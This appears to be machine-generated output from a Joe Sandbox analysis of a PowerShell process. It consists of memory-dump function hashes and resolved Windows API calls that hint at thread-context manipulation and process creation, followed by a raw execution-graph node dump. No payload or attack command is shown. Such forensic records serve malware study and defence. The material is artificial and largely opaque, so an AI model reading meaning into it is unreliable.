• Opcode ID: c628d6fd3c5aa4c9c370e4f2c7c4cedc9ff61277e91eadbe2f06d47151639415
• Instruction ID: 7c54ebf833af039c9f53652bd74b4c3a58405f954e25e3c5345e7483cc0a6097
• Opcode Fuzzy Hash: c628d6fd3c5aa4c9c370e4f2c7c4cedc9ff61277e91eadbe2f06d47151639415
• Instruction Fuzzy Hash: CC31073050D7888FDB5ADBA8CC557A97FE0EF56320F04429BD049C71A3D664A446CB92

Control-flow Graph: function at 7ffd9b8b0fe4 (interactive graph widget not rendered; API call shown: NtResumeThread)
Memory Dump Source
• Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: d7e84ab42f08bccfaa7c26eaa299c0d439232ed62c1a87a6e67b8417ecf1d962
• Instruction ID: e8a2ba6e9b08658fc3bea502c9ff217ea57b99100d3471f53e0bd10c6d3c3899
• Opcode Fuzzy Hash: d7e84ab42f08bccfaa7c26eaa299c0d439232ed62c1a87a6e67b8417ecf1d962
• Instruction Fuzzy Hash: 52312830A0C64C8FDB58DF9CD845BE9BBE1EF5A320F04416BD049C7292DB70A842CB91

Control-flow Graph: function at 7ffd9b8b0f20 (interactive graph widget not rendered; API call shown: NtSetContextThread)
Memory Dump Source
• Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
Similarity
• API ID: ContextThread
• String ID:
• API String ID: 1591575202-0
• Opcode ID: a99dd98540d280b70b219f943858c299ee51a6111ead28e815c656323466fe58
• Instruction ID: 2e6ef34310ec199f186715fa25ae3b56e624f801d474fa987ad3a092ba866d5e
• Opcode Fuzzy Hash: a99dd98540d280b70b219f943858c299ee51a6111ead28e815c656323466fe58
• Instruction Fuzzy Hash: 4D219131A0CB4C8FDB58DF98D846BE97BF0EB5A320F04416FD049C7256D674A856CB91

Memory Dump Source
• Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cd867a7ffd8d826bc3ad51c78291f1a21242d69eddc3ad7553be11ed2516d461
• Instruction ID: 574616ff617c990fcf175933e0abe552e1446f37db422eef747ba38ad9f51036
• Opcode Fuzzy Hash: cd867a7ffd8d826bc3ad51c78291f1a21242d69eddc3ad7553be11ed2516d461
• Instruction Fuzzy Hash: F1713821F0DA4D0EE729A7A848252FE77E1EF89300F56453ED09EC31E7ED29A9024352

Memory Dump Source
• Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4e3408b4e5882b44d0abbf1281f2ee304ea06a46e73d26eaed76b75f82de6345
• Instruction ID: c5e88f9cbed28643348f1573172c28e01deef98540dd202d8c849d0a782d94f2
• Opcode Fuzzy Hash: 4e3408b4e5882b44d0abbf1281f2ee304ea06a46e73d26eaed76b75f82de6345
• Instruction Fuzzy Hash: CB71D931F1D90D4AE72CABA858626FE72D2EF9C305F51453DD45FC35DAED28A9024282

Memory Dump Source
• Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b986a733e0f44b48b086973fb5f7eb90985f625b253dd8692c2579ccf889a391
• Instruction ID: 8c1b76da22c236d971837def0b1ce38696c010034894626a6b0d3670c720b94a
• Opcode Fuzzy Hash: b986a733e0f44b48b086973fb5f7eb90985f625b253dd8692c2579ccf889a391
• Instruction Fuzzy Hash: AB612831F0DA0D0AE76CABA858222FE73D2EF88315F51453ED45FC35E6ED29A9034252

Control-flow Graph: function at 7ffd9b8b0221 (interactive graph widget not rendered; API call shown: CreateProcessA; calls 7ffd9b8b09af)
Memory Dump Source
• Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 6257ebf1181c19f11cea7f523e81e267bf7a48be6a2dccbb244d326b14dfe1d8
• Instruction ID: 40610f5da7b392c08fa20d730cf6bf18477b02c7e0046f80a0a53895fa88491a
• Opcode Fuzzy Hash: 6257ebf1181c19f11cea7f523e81e267bf7a48be6a2dccbb244d326b14dfe1d8
• Instruction Fuzzy Hash: 08D14530A19B8D8FEB64DF68CC567E977E0FF59310F01426AD84DC7292DA34A9458BC2

                                                                  Control-flow Graph (graph image not reproduced; the graph contains a call to CreateFileMappingW)
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFileMapping
                                                                  • String ID:
                                                                  • API String ID: 524692379-0
                                                                  • Opcode ID: 0142ca6e13d5b59f89199da0685bda72f0c5a50181f07c6fa604adb0628e125e
                                                                  • Instruction ID: 8608a86a17b2dc0420d8203c0d23d0115c7c5dbe054e48a7457cecadd118819f
                                                                  • Opcode Fuzzy Hash: 0142ca6e13d5b59f89199da0685bda72f0c5a50181f07c6fa604adb0628e125e
                                                                  • Instruction Fuzzy Hash: F071173060CB8D4FDB69DF68C8557E43BE1FF59311F1442AAE84DC72A2DA74E8418B92

                                                                  Control-flow Graph (graph image not reproduced; the graph contains a call to CreateFileA)
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 5d2aaadcfbf7bed7488837038e5e7fe367fb4b7def2474f875ef0d9cb048d716
                                                                  • Instruction ID: f7fa26eda4a65b94d916b46a3e5e018f83bd294d582d68f78acdf80fbce57758
                                                                  • Opcode Fuzzy Hash: 5d2aaadcfbf7bed7488837038e5e7fe367fb4b7def2474f875ef0d9cb048d716
                                                                  • Instruction Fuzzy Hash: 5861E830918B8D8FEB68DF58C8557E437E0FF59311F14427AE84DC7292DA74E9418B91

                                                                  Control-flow Graph (graph image not reproduced; the graph contains a call to MapViewOfFile)
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: FileView
                                                                  • String ID:
                                                                  • API String ID: 3314676101-0
                                                                  • Opcode ID: 2ce88bbfc47cdf0195d36a6c257645c301ae720685f249722fc3820e0de2beb1
                                                                  • Instruction ID: 8bfdbb5f966ecbb7ec88250ae8b6646f9ab71172c5f5a72f8a55ac203d249197
                                                                  • Opcode Fuzzy Hash: 2ce88bbfc47cdf0195d36a6c257645c301ae720685f249722fc3820e0de2beb1
                                                                  • Instruction Fuzzy Hash: 4A41283190CA889FDB19DBA8D8066E87BF0FF5A321F14026ED089C31A2CB646852C791

                                                                  Control-flow Graph (graph image not reproduced; the graph contains a call to K32GetModuleInformation)
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1908836581.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: InformationModule
                                                                  • String ID:
                                                                  • API String ID: 3425974696-0
                                                                  • Opcode ID: 5e106f72d836d01dbed32f4eaaac85659e73fd1939fa31352c63372dbdf9f4bf
                                                                  • Instruction ID: 2a5f633fa1954ef3de621ad6af8479464c5def06d95f382ffdaf73888214d0ea
                                                                  • Opcode Fuzzy Hash: 5e106f72d836d01dbed32f4eaaac85659e73fd1939fa31352c63372dbdf9f4bf
                                                                  • Instruction Fuzzy Hash: D2312430A0CA4C8FDB1CDBAC98456F9BBE1EF59321F00426FD049C3292DB74A8468B81

                                                                  Control-flow Graph (graph image not reproduced; no API calls resolved in this graph)
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1944302520.00007FFD9BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9bb40000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d915adafcaea91732edb89a501f30e248d9a4e19b717363bafcf9bae59a9c588
                                                                  • Instruction ID: 99893f5937beaf0857bb17654786570c89687423814fb5e98545489f4e46d95f
                                                                  • Opcode Fuzzy Hash: d915adafcaea91732edb89a501f30e248d9a4e19b717363bafcf9bae59a9c588
                                                                  • Instruction Fuzzy Hash: F6427922B0EF8D0FEBA69A6858645B57BE2FF56214B0901FBD44CC71E3EE18AD05C351
                                                                  Memory Dump Source
                                                                  • Source File: 0000001C.00000002.1912877628.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_28_2_7ffd9b970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a2f4ddefec7e1a7b386adb115be32188378721e1a76de934bbd9f52528f5bb91
                                                                  • Instruction ID: cb77e874ce6a89883b4b21bac97cd184898fb180d0907eccd11804a292bfab8f
                                                                  • Opcode Fuzzy Hash: a2f4ddefec7e1a7b386adb115be32188378721e1a76de934bbd9f52528f5bb91
                                                                  • Instruction Fuzzy Hash: 5121F252F2FBCA1FE3A597A828A41A477C1EF66360B1901FAD46DCB2E7ED195C058301

                                                                  Execution Graph

                                                                  Execution Coverage:0.8%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:2.2%
                                                                  Total number of Nodes:1428
                                                                  Total number of Limit Nodes:1
2408a299a64 __CxxCallCatchBlock 9 API calls 8276->8278 8278->8277 8279 2408a2a50cf 8280 2408a2a50e7 8279->8280 8286 2408a2a5152 8279->8286 8281 2408a299a64 __CxxCallCatchBlock 9 API calls 8280->8281 8280->8286 8282 2408a2a5134 8281->8282 8283 2408a299a64 __CxxCallCatchBlock 9 API calls 8282->8283 8284 2408a2a5149 8283->8284 8285 2408a29cad8 23 API calls 8284->8285 8285->8286 8959 2408a297f4c 8960 2408a297f70 __scrt_acquire_startup_lock 8959->8960 8961 2408a29bd15 8960->8961 8962 2408a29d3d0 __std_exception_copy 11 API calls 8960->8962 8963 2408a29bd3e 8962->8963 8287 2408a29decc 8288 2408a29def1 8287->8288 8297 2408a29df08 8287->8297 8289 2408a29dadc __std_exception_copy 11 API calls 8288->8289 8290 2408a29def6 8289->8290 8292 2408a29d9a0 _invalid_parameter_noinfo 49 API calls 8290->8292 8291 2408a29dfc0 8341 2408a29c32c 8291->8341 8294 2408a29df01 8292->8294 8296 2408a29e020 8299 2408a29db74 __free_lconv_mon 11 API calls 8296->8299 8297->8291 8302 2408a29df98 8297->8302 8304 2408a29df55 8297->8304 8319 2408a29e110 8297->8319 8301 2408a29e027 8299->8301 8300 2408a29e0b1 8303 2408a29db74 __free_lconv_mon 11 API calls 8300->8303 8306 2408a29df78 8301->8306 8308 2408a29db74 __free_lconv_mon 11 API calls 8301->8308 8302->8306 8309 2408a29db74 __free_lconv_mon 11 API calls 8302->8309 8307 2408a29e0bc 8303->8307 8304->8306 8312 2408a29db74 __free_lconv_mon 11 API calls 8304->8312 8305 2408a29e052 8305->8300 8305->8305 8316 2408a29e0f7 8305->8316 8347 2408a2a1380 8305->8347 8311 2408a29db74 __free_lconv_mon 11 API calls 8306->8311 8310 2408a29e0d5 8307->8310 8314 2408a29db74 __free_lconv_mon 11 API calls 8307->8314 8308->8301 8309->8302 8315 2408a29db74 __free_lconv_mon 11 API calls 8310->8315 8311->8294 8312->8304 8314->8307 8315->8294 8317 2408a29d9c0 _invalid_parameter_noinfo 17 API calls 8316->8317 8318 2408a29e10c 8317->8318 8320 2408a29e13e 8319->8320 8320->8320 8321 2408a29dafc _invalid_parameter_noinfo 11 API calls 8320->8321 8322 2408a29e189 8321->8322 8323 
2408a2a1380 49 API calls 8322->8323 8324 2408a29e1bf 8323->8324 8325 2408a29d9c0 _invalid_parameter_noinfo 17 API calls 8324->8325 8326 2408a29e293 8325->8326 8356 2408a29e5e4 8326->8356 8333 2408a29e43d 8334 2408a29e5e4 23 API calls 8333->8334 8335 2408a29e46d 8334->8335 8336 2408a29f9d8 5 API calls 8335->8336 8337 2408a29e496 8336->8337 8389 2408a29dd40 8337->8389 8340 2408a29e110 59 API calls 8342 2408a29c344 8341->8342 8346 2408a29c37c 8341->8346 8343 2408a29dafc _invalid_parameter_noinfo 11 API calls 8342->8343 8342->8346 8344 2408a29c372 8343->8344 8345 2408a29db74 __free_lconv_mon 11 API calls 8344->8345 8345->8346 8346->8296 8346->8305 8350 2408a2a139d 8347->8350 8348 2408a2a13a2 8349 2408a29dadc __std_exception_copy 11 API calls 8348->8349 8353 2408a2a13b8 8348->8353 8355 2408a2a13ac 8349->8355 8350->8348 8351 2408a2a13ec 8350->8351 8350->8353 8351->8353 8354 2408a29dadc __std_exception_copy 11 API calls 8351->8354 8352 2408a29d9a0 _invalid_parameter_noinfo 49 API calls 8352->8353 8353->8305 8354->8355 8355->8352 8357 2408a29e608 8356->8357 8363 2408a29e376 8356->8363 8358 2408a29d258 _invalid_parameter_noinfo 23 API calls 8357->8358 8357->8363 8359 2408a29e623 8358->8359 8411 2408a2a082c 8359->8411 8364 2408a29f9d8 8363->8364 8365 2408a29f7c4 5 API calls 8364->8365 8366 2408a29e3a1 8365->8366 8367 2408a29dbc4 8366->8367 8368 2408a29dbee 8367->8368 8369 2408a29dc12 8367->8369 8373 2408a29db74 __free_lconv_mon 11 API calls 8368->8373 8378 2408a29dbfd FindFirstFileExW 8368->8378 8370 2408a29dc6c 8369->8370 8371 2408a29dc17 8369->8371 8426 2408a29f4ac 8370->8426 8374 2408a29dc2c 8371->8374 8375 2408a29db74 __free_lconv_mon 11 API calls 8371->8375 8371->8378 8373->8378 8419 2408a29ce3c 8374->8419 8375->8374 8378->8333 8390 2408a29dd6a 8389->8390 8391 2408a29dd8e 8389->8391 8395 2408a29db74 __free_lconv_mon 11 API calls 8390->8395 8396 2408a29dd79 8390->8396 8392 2408a29dde8 8391->8392 8393 2408a29dd94 8391->8393 8429 2408a29f53c 8392->8429 8393->8396 8397 
2408a29dda9 8393->8397 8398 2408a29db74 __free_lconv_mon 11 API calls 8393->8398 8395->8396 8396->8340 8399 2408a29ce3c 12 API calls 8397->8399 8398->8397 8399->8396 8412 2408a2a0841 8411->8412 8413 2408a29e646 8411->8413 8412->8413 8414 2408a2a0e8c _invalid_parameter_noinfo 23 API calls 8412->8414 8415 2408a2a0898 8413->8415 8414->8413 8416 2408a2a08ad 8415->8416 8417 2408a2a08c0 8415->8417 8416->8417 8418 2408a29f120 _invalid_parameter_noinfo 23 API calls 8416->8418 8417->8363 8418->8417 8420 2408a29ce87 8419->8420 8424 2408a29ce4b _invalid_parameter_noinfo 8419->8424 8421 2408a29dadc __std_exception_copy 11 API calls 8420->8421 8423 2408a29ce85 8421->8423 8422 2408a29ce6e HeapAlloc 8422->8423 8422->8424 8423->8378 8424->8420 8424->8422 8425 2408a29bc8c _invalid_parameter_noinfo 2 API calls 8424->8425 8425->8424 8427 2408a29f4b5 MultiByteToWideChar 8426->8427 8431 2408a29f560 WideCharToMultiByte 8429->8431 8008 2408a298440 8011 2408a299818 8008->8011 8010 2408a298469 8012 2408a29986e __std_exception_destroy 8011->8012 8013 2408a299839 8011->8013 8012->8010 8013->8012 8015 2408a29cb18 8013->8015 8016 2408a29cb2f 8015->8016 8017 2408a29cb25 8015->8017 8018 2408a29dadc __std_exception_copy 11 API calls 8016->8018 8017->8016 8022 2408a29cb4a 8017->8022 8019 2408a29cb36 8018->8019 8020 2408a29d9a0 _invalid_parameter_noinfo 49 API calls 8019->8020 8021 2408a29cb42 8020->8021 8021->8012 8022->8021 8023 2408a29dadc __std_exception_copy 11 API calls 8022->8023 8023->8019 8432 2408a297ec0 8433 2408a297ec9 __scrt_acquire_startup_lock 8432->8433 8435 2408a297ecd 8433->8435 8436 2408a29c38c 8433->8436 8437 2408a29c3ac 8436->8437 8466 2408a29c3c3 8436->8466 8438 2408a29c3ca 8437->8438 8439 2408a29c3b4 8437->8439 8467 2408a29f0c0 8438->8467 8440 2408a29dadc __std_exception_copy 11 API calls 8439->8440 8442 2408a29c3b9 8440->8442 8444 2408a29d9a0 _invalid_parameter_noinfo 49 API calls 8442->8444 8444->8466 8449 2408a29c32c 11 API calls 8450 2408a29c439 8449->8450 8451 
2408a29c459 8450->8451 8452 2408a29c441 8450->8452 8454 2408a29c164 23 API calls 8451->8454 8453 2408a29dadc __std_exception_copy 11 API calls 8452->8453 8455 2408a29c446 8453->8455 8458 2408a29c475 8454->8458 8456 2408a29db74 __free_lconv_mon 11 API calls 8455->8456 8456->8466 8457 2408a29c47b 8459 2408a29db74 __free_lconv_mon 11 API calls 8457->8459 8458->8457 8460 2408a29c4c0 8458->8460 8461 2408a29c4a7 8458->8461 8459->8466 8464 2408a29db74 __free_lconv_mon 11 API calls 8460->8464 8462 2408a29db74 __free_lconv_mon 11 API calls 8461->8462 8463 2408a29c4b0 8462->8463 8465 2408a29db74 __free_lconv_mon 11 API calls 8463->8465 8464->8457 8465->8466 8466->8435 8468 2408a29c3cf 8467->8468 8469 2408a29f0cd 8467->8469 8473 2408a29e7a4 GetModuleFileNameW 8468->8473 8491 2408a29d32c 8469->8491 8471 2408a29f0fc 8508 2408a29ed98 8471->8508 8474 2408a29e7e9 GetLastError 8473->8474 8475 2408a29e7fd 8473->8475 8649 2408a29da50 8474->8649 8477 2408a29e5e4 23 API calls 8475->8477 8479 2408a29e82b 8477->8479 8478 2408a29e7f6 8480 2408a297d70 _log10_special 8 API calls 8478->8480 8481 2408a29f9d8 5 API calls 8479->8481 8484 2408a29e83c 8479->8484 8483 2408a29c3e6 8480->8483 8481->8484 8485 2408a29c164 8483->8485 8654 2408a29e688 8484->8654 8487 2408a29c1a2 8485->8487 8489 2408a29c20e 8487->8489 8668 2408a29f470 8487->8668 8488 2408a29c2ff 8488->8449 8489->8488 8490 2408a29f470 23 API calls 8489->8490 8490->8489 8492 2408a29d358 FlsSetValue 8491->8492 8493 2408a29d33d FlsGetValue 8491->8493 8495 2408a29d365 8492->8495 8496 2408a29d34a 8492->8496 8494 2408a29d352 8493->8494 8493->8496 8494->8492 8497 2408a29dafc _invalid_parameter_noinfo 11 API calls 8495->8497 8496->8471 8498 2408a29d374 8497->8498 8499 2408a29d392 FlsSetValue 8498->8499 8500 2408a29d382 FlsSetValue 8498->8500 8502 2408a29d39e FlsSetValue 8499->8502 8503 2408a29d3b0 8499->8503 8501 2408a29d38b 8500->8501 8505 2408a29db74 __free_lconv_mon 11 API calls 8501->8505 8502->8501 8504 2408a29cfc4 _invalid_parameter_noinfo 
11 API calls 8503->8504 8506 2408a29d3b8 8504->8506 8505->8496 8507 2408a29db74 __free_lconv_mon 11 API calls 8506->8507 8507->8496 8531 2408a29f008 8508->8531 8513 2408a29edea 8513->8468 8514 2408a29ce3c 12 API calls 8515 2408a29edfb 8514->8515 8516 2408a29ee03 8515->8516 8518 2408a29ee12 8515->8518 8517 2408a29db74 __free_lconv_mon 11 API calls 8516->8517 8517->8513 8518->8518 8550 2408a29f13c 8518->8550 8521 2408a29ef0e 8522 2408a29dadc __std_exception_copy 11 API calls 8521->8522 8524 2408a29ef13 8522->8524 8523 2408a29ef69 8526 2408a29efd0 8523->8526 8561 2408a29e8c8 8523->8561 8527 2408a29db74 __free_lconv_mon 11 API calls 8524->8527 8525 2408a29ef28 8525->8523 8528 2408a29db74 __free_lconv_mon 11 API calls 8525->8528 8530 2408a29db74 __free_lconv_mon 11 API calls 8526->8530 8527->8513 8528->8523 8530->8513 8532 2408a29f02b 8531->8532 8533 2408a29f035 8532->8533 8576 2408a29cdcc EnterCriticalSection 8532->8576 8536 2408a29edcd 8533->8536 8540 2408a29d32c 16 API calls 8533->8540 8543 2408a29ea98 8536->8543 8541 2408a29f0fc 8540->8541 8542 2408a29ed98 69 API calls 8541->8542 8542->8536 8544 2408a29e5e4 23 API calls 8543->8544 8545 2408a29eaac 8544->8545 8546 2408a29eaca 8545->8546 8547 2408a29eab8 GetOEMCP 8545->8547 8548 2408a29eadf 8546->8548 8549 2408a29eacf GetACP 8546->8549 8547->8548 8548->8513 8548->8514 8549->8548 8551 2408a29ea98 25 API calls 8550->8551 8553 2408a29f169 8551->8553 8552 2408a29f2bf 8555 2408a297d70 _log10_special 8 API calls 8552->8555 8553->8552 8554 2408a29f1c0 8553->8554 8556 2408a29f1a6 IsValidCodePage 8553->8556 8577 2408a29ebb0 8554->8577 8558 2408a29ef05 8555->8558 8556->8552 8557 2408a29f1b7 8556->8557 8557->8554 8559 2408a29f1e6 GetCPInfo 8557->8559 8558->8521 8558->8525 8559->8552 8559->8554 8648 2408a29cdcc EnterCriticalSection 8561->8648 8578 2408a29ebed GetCPInfo 8577->8578 8587 2408a29ece3 8577->8587 8583 2408a29ec00 8578->8583 8578->8587 8579 2408a297d70 _log10_special 8 API calls 8581 2408a29ed82 8579->8581 8581->8552 
8588 2408a2a1974 8583->8588 8586 2408a2a1e38 40 API calls 8586->8587 8587->8579 8589 2408a29e5e4 23 API calls 8588->8589 8590 2408a2a19b6 8589->8590 8591 2408a29f4ac MultiByteToWideChar 8590->8591 8593 2408a2a19ec 8591->8593 8592 2408a2a19f3 8595 2408a297d70 _log10_special 8 API calls 8592->8595 8593->8592 8594 2408a29ce3c 12 API calls 8593->8594 8597 2408a2a1ab0 8593->8597 8599 2408a2a1a1c 8593->8599 8594->8599 8596 2408a29ec77 8595->8596 8603 2408a2a1e38 8596->8603 8597->8592 8598 2408a29db74 __free_lconv_mon 11 API calls 8597->8598 8598->8592 8599->8597 8600 2408a29f4ac MultiByteToWideChar 8599->8600 8601 2408a2a1a92 8600->8601 8601->8597 8602 2408a2a1a96 GetStringTypeW 8601->8602 8602->8597 8604 2408a29e5e4 23 API calls 8603->8604 8605 2408a2a1e5d 8604->8605 8608 2408a2a1b04 8605->8608 8609 2408a2a1b45 8608->8609 8610 2408a29f4ac MultiByteToWideChar 8609->8610 8613 2408a2a1b8f 8610->8613 8611 2408a2a1e0d 8612 2408a297d70 _log10_special 8 API calls 8611->8612 8614 2408a29ecaa 8612->8614 8613->8611 8615 2408a29ce3c 12 API calls 8613->8615 8617 2408a2a1bc7 8613->8617 8627 2408a2a1cc5 8613->8627 8614->8586 8615->8617 8616 2408a29db74 __free_lconv_mon 11 API calls 8616->8611 8618 2408a29f4ac MultiByteToWideChar 8617->8618 8617->8627 8619 2408a2a1c3a 8618->8619 8619->8627 8639 2408a29faac 8619->8639 8622 2408a2a1c85 8626 2408a29faac 6 API calls 8622->8626 8622->8627 8623 2408a2a1da8 8623->8627 8628 2408a29db74 __free_lconv_mon 11 API calls 8623->8628 8624 2408a2a1cd6 8624->8623 8625 2408a29ce3c 12 API calls 8624->8625 8629 2408a2a1cf4 8624->8629 8625->8629 8626->8627 8627->8611 8627->8616 8628->8627 8629->8627 8630 2408a29faac 6 API calls 8629->8630 8631 2408a2a1d74 8630->8631 8631->8623 8632 2408a2a1daa 8631->8632 8633 2408a2a1d94 8631->8633 8634 2408a29f53c WideCharToMultiByte 8632->8634 8635 2408a29f53c WideCharToMultiByte 8633->8635 8636 2408a2a1da2 8634->8636 8635->8636 8636->8623 8637 2408a2a1dc2 8636->8637 8637->8627 8638 2408a29db74 __free_lconv_mon 11 API 
calls 8637->8638 8638->8627 8640 2408a29f7c4 5 API calls 8639->8640 8641 2408a29faea 8640->8641 8642 2408a29faf2 8641->8642 8645 2408a29fb98 8641->8645 8642->8622 8642->8624 8642->8627 8644 2408a29fb5b LCMapStringW 8644->8642 8646 2408a29f7c4 5 API calls 8645->8646 8647 2408a29fbc6 8646->8647 8647->8644 8650 2408a29d3d0 __std_exception_copy 11 API calls 8649->8650 8651 2408a29da5d __free_lconv_mon 8650->8651 8652 2408a29d3d0 __std_exception_copy 11 API calls 8651->8652 8653 2408a29da7f 8652->8653 8653->8478 8655 2408a29e6c7 8654->8655 8659 2408a29e6ac 8654->8659 8656 2408a29f53c WideCharToMultiByte 8655->8656 8661 2408a29e6cc 8655->8661 8657 2408a29e723 8656->8657 8660 2408a29e72a GetLastError 8657->8660 8657->8661 8662 2408a29e755 8657->8662 8658 2408a29dadc __std_exception_copy 11 API calls 8658->8659 8659->8478 8663 2408a29da50 11 API calls 8660->8663 8661->8658 8661->8659 8665 2408a29f53c WideCharToMultiByte 8662->8665 8664 2408a29e737 8663->8664 8666 2408a29dadc __std_exception_copy 11 API calls 8664->8666 8667 2408a29e77c 8665->8667 8666->8659 8667->8659 8667->8660 8669 2408a29f3fc 8668->8669 8670 2408a29e5e4 23 API calls 8669->8670 8671 2408a29f420 8670->8671 8671->8487 8024 2408a29b444 8047 2408a299a64 8024->8047 8026 2408a29b479 8027 2408a299a64 __CxxCallCatchBlock 9 API calls 8026->8027 8028 2408a29b487 __except_validate_context_record 8027->8028 8029 2408a299a64 __CxxCallCatchBlock 9 API calls 8028->8029 8030 2408a29b4cb 8029->8030 8031 2408a299a64 __CxxCallCatchBlock 9 API calls 8030->8031 8032 2408a29b4d4 8031->8032 8033 2408a299a64 __CxxCallCatchBlock 9 API calls 8032->8033 8034 2408a29b4dd 8033->8034 8050 2408a29a084 8034->8050 8037 2408a299a64 __CxxCallCatchBlock 9 API calls 8038 2408a29b50d __CxxCallCatchBlock 8037->8038 8057 2408a29a0c0 8038->8057 8040 2408a29b5e7 __CxxCallCatchBlock 8041 2408a299a64 __CxxCallCatchBlock 9 API calls 8040->8041 8042 2408a29b5fa 8041->8042 8044 2408a299a64 __CxxCallCatchBlock 9 API calls 8042->8044 8045 2408a29b603 
8044->8045 8068 2408a299a80 8047->8068 8049 2408a299a6d 8049->8026 8051 2408a299a64 __CxxCallCatchBlock 9 API calls 8050->8051 8052 2408a29a095 8051->8052 8053 2408a29a0a0 8052->8053 8054 2408a299a64 __CxxCallCatchBlock 9 API calls 8052->8054 8055 2408a299a64 __CxxCallCatchBlock 9 API calls 8053->8055 8054->8053 8056 2408a29a0b1 8055->8056 8056->8037 8056->8038 8058 2408a299a64 __CxxCallCatchBlock 9 API calls 8057->8058 8059 2408a29a0d2 8058->8059 8060 2408a29a10d 8059->8060 8061 2408a299a64 __CxxCallCatchBlock 9 API calls 8059->8061 8062 2408a29a0dd 8061->8062 8062->8060 8063 2408a299a64 __CxxCallCatchBlock 9 API calls 8062->8063 8064 2408a29a0fe 8063->8064 8064->8040 8065 2408a299750 8064->8065 8066 2408a299a64 __CxxCallCatchBlock 9 API calls 8065->8066 8067 2408a29975e 8066->8067 8067->8040 8069 2408a299a98 8068->8069 8070 2408a299a9f GetLastError 8068->8070 8069->8049 8080 2408a29a3d4 8070->8080 8081 2408a29a1f4 __vcrt_FlsAlloc 5 API calls 8080->8081 8082 2408a29a3fb TlsGetValue 8081->8082 8672 2408a2928c4 8674 2408a29290a 8672->8674 8673 2408a292970 8674->8673 8675 2408a293c74 StrCmpNIW 8674->8675 8675->8674 8084 2408a292a58 8086 2408a292aac 8084->8086 8085 2408a292ac7 8086->8085 8088 2408a2933f8 8086->8088 8089 2408a29348e 8088->8089 8091 2408a29341d 8088->8091 8089->8085 8090 2408a293c74 StrCmpNIW 8090->8091 8091->8089 8091->8090 8092 2408a291d0c StrCmpIW StrCmpW 8091->8092 8092->8091 9307 2408a2a39db 9309 2408a2a3c80 9307->9309 9312 2408a2a3a1b 9307->9312 9308 2408a2a3c62 9315 2408a2a4790 9308->9315 9310 2408a2a3c76 9309->9310 9314 2408a2a4790 _log10_special 20 API calls 9309->9314 9311 2408a2a3a4f 9312->9308 9312->9309 9312->9311 9314->9310 9318 2408a2a47b0 9315->9318 9320 2408a2a47ca 9318->9320 9319 2408a2a47ab 